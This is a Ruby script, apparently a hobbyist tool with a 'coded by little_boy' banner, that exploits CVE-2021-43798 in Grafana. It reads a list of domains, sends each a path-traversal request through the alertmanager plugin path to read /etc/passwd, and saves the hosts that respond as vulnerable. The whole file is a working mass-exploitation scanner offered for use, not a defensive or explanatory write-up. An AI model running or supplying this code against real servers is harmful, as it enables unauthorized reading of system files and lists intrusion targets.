cve-2021-43798.rb

require 'httparty'
require 'colorize'
require 'timeout'

puts '
█████████████████████████████████████████████████████████████████████████████
█─▄▄▄─█▄─█─▄█▄─▄▄─█▀▀▀▀▀██▀▄▄▀█─▄▄─█▀▄▄▀█▀░██▀▀▀▀▀██░█░██▄▄▄░█▄▄▄░█░▄▄░█▀▄▄▀█
█─███▀██▄▀▄███─▄█▀█████████▀▄██─██─██▀▄███░█████████▄▄░███▄▄░███░██▄▄▄░█▀▄▄▀█
▀▄▄▄▄▄▀▀▀▄▀▀▀▄▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▀▄▄▄▄▀▄▄▄▄▀▄▄▄▀▀▀▀▀▀▀▀▀▄▄▄▀▄▄▄▄▀▀▄██▀▄▄▄▄▀█▄▄█▀
			 coded by little_boy'.green
puts
puts
print 'Enter domain list : '
domain = gets.chomp
print 'Enter file name save : '
file_name = gets.chomp

file = File.open(domain, "r").read
data = file.split("\n")

data.each do |domen|
begin
    status = Timeout::timeout(2){
    response = HTTParty.get(domen+'/public/plugins/alertmanager/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd',follow_redirects: false)
    puts

if response.body.include?('daemon' || '/nologin')
    puts '[+] => Vulnerable'.colorize(:yellow)
    File.open("#{file_name}","a+"){|file|file.write("#{domen}\n")}
    puts "File Saved => #{Dir.pwd}/#{file_name}".yellow
else !response.body.include?('daemon' || '/nologin')
    puts '[-] => Not Vulnerable'.colorize(:red)
end
}
rescue OpenSSL::SSL::SSLError
    puts
    puts "[-] => SSL Error...".red
rescue Errno::ECONNREFUSED
    puts "[-] => Connection Refused!" 
rescue Timeout::Error
    puts
    puts "[-] => Time Out...".red
rescue Errno::ECONNRESET
rescue Interrupt
    puts "Leaving the program...".red
end
end